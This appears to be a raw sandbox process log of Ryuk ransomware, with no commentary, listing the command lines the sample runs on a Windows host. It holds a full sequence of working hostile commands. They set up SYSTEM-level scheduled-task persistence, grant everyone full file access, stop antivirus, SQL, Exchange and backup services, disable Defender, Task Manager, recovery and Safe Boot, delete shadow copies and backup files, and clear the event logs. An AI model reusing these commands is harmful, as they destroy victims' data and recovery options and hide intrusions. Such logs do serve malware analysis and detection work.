C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AMSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AirSpaceChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "FirstUXPerf-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "General Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "IHM_DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceMFT"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationFrameServer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProcD3D"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationAsyncWrapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationContentProtection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDS"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMP4"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMediaEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformanceCore"

